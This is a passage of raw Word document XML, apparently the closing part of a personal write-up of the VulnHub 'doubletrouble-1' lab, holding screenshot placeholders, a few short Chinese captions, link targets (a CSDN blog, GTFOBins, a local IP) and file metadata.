      </w:r>
    </w:p>
    <w:p w14:paraId="1F004FB4" w14:textId="6FF93EBE" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="00317674">
      <w:r w:rsidRPr="00317674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47E8E839" wp14:editId="4D21AD72">
            <wp:extent cx="2682472" cy="838273"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2006075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750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597B" w14:textId="7BCCC43C" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="00317674">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搞定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5334F05E" w14:textId="6FEAF1E9" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="00317674">
      <w:r w:rsidRPr="00317674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234F729B" wp14:editId="39EC5AA2">
            <wp:extent cx="2865368" cy="655377"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2054715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1523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968A" w14:textId="172A081D" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="00317674">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换账户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295D6846" w14:textId="6ADDFD07" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="00317674">
      <w:r w:rsidRPr="00317674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6140DC91" wp14:editId="105A9D97">
            <wp:extent cx="4694327" cy="975445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1248233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3317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6618" w14:textId="57724695" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="00317674">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383A2EE" w14:textId="031E9024" w:rsidR="00317674" w:rsidRPr="00317674" w:rsidRDefault="00317674" w:rsidP="00317674">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿下！</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00317674" w:rsidRPr="003176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E39"/>
    <w:rsid w:val="0023569F"/>
    <w:rsid w:val="002740A1"/>
    <w:rsid w:val="002D4B06"/>
    <w:rsid w:val="00317674"/>
    <w:rsid w:val="004C1076"/>
    <w:rsid w:val="0080703E"/>
    <w:rsid w:val="00853C24"/>
    <w:rsid w:val="008F6B3F"/>
    <w:rsid w:val="00B94F2B"/>
    <w:rsid w:val="00D917D3"/>
    <w:rsid w:val="00E15868"/>
    <w:rsid w:val="00EC05F1"/>
    <w:rsid w:val="00FB4E39"/>
    <w:rsid w:val="00FF1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A6858"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5074BCED-F21E-404E-A15F-CD26FEAF4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1DB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F1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9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22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blog.csdn.net/Aluxian_/article/details/133470236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hyperlink" Target="http://192.168.21.151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tfobins.github.io/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hyperlink" Target="https://www.vulnhub.com/entry/doubletrouble-1,743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1076</Words>
  <Characters>6134</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>51</Lines>
  <Paragraphs>14</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7196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泽巍 吴</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>泽巍 吴</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-06T03:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T05:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>